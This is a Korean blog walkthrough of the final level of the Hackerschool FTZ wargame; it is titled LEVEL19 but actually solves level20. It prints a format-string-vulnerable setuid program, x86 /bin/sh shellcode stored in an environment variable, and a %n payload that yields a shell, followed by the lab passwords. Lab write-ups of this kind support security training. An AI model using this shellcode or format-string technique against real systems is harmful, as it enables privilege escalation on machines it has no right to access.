해커스쿨 FTZ [LEVEL19] 풀이
M4ndU
해커스쿨 FTZ [LEVEL19] 풀이입니다.
ID | level19
PW | we are just regular guys
으로 로그인합니다.
$ ls -l
를 이용해 어떤 파일과 어떤 폴더가 있는지 확인하고,
$ cat hint
를 이용해 힌트를 확인합시다.
login as: level20
level20@192.168.31.128's password:
[level20@ftz level20]$ ls -l
total 24
-rwsr-sr-x 1 clear clear 11777 Jun 18 2008 attackme
-rw-r----- 1 root level20 133 May 13 2002 hint
drwxr-xr-x 2 root level20 4096 Feb 24 2002 public_html
drwxrwxr-x 2 root level20 4096 Jan 11 2009 tmp
[level20@ftz level20]$ cat hint
#include <stdio.h>
main(int argc,char **argv)
{ char bleh[80];
setreuid(3101,3101);
fgets(bleh,79,stdin);
printf(bleh);
}
$export EGG=`python -c 'print "\x90"*15+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
$echo 'int main() { printf("ADDR -> 0x%x\n", getenv("EGG")); } ' > getenv.c
$gcc getenv.c -o getenv
$./getenv
(python -c 'print "AAAA\x98\x95\x04\x08AAAA\x9a\x95\x04\x08"+"%8x%8x%8x"+"%64613c%n"+"%50034c%n"'; cat) | ./attackme
[level20@ftz level20]$ (python -c 'print "AAAA\x98\x95\x04\x08AAAA\x9a\x95\x04\x08"+"%8x%8x%8x"+"%64613c%n"+"%50034c%n"'; cat) | ./attackme
AAAA쁀AAA? 4f4212ecc04207a750 (공백)
my-pass
TERM environment variable not set.
clear Password is "i will come in a minute".
웹에서 등록하세요.
* 해커스쿨의 든 레벨을 통과하신 것을 축하드립니다.
당신의 끈질긴 열정과 능숙한 솜씨에 찬사를 보냅니다.
해커스쿨에서는 실력있 분들을 모아 연구소라는 그룹을 운영하고 있습니다.
이 메시지를 보시는 분들 중에 연구소에 관심있으신 분은 자유로운 양식의
가입 신청서를 admin@hackerschool.org로 보내주시기 바랍니다.
이렇게 FTZ가 끝이 났습니다. 이제 LOB로 가즈아아아아아!
'System Hacking > FTZ' 카테고리의 다른 글
| 해커스쿨 FTZ [LEVEL19] 풀이 (0) | 2018.02.09 |
|---|---|
| 해커스쿨 FTZ [LEVEL18] 풀이 (3) | 2018.02.09 |
| 해커스쿨 FTZ [LEVEL17] 풀이 (2) | 2018.02.09 |
| 해커스쿨 FTZ [LEVEL16] 풀이 (4) | 2018.02.09 |
| 해커스쿨 FTZ [LEVEL15] 풀이 (0) | 2018.02.09 |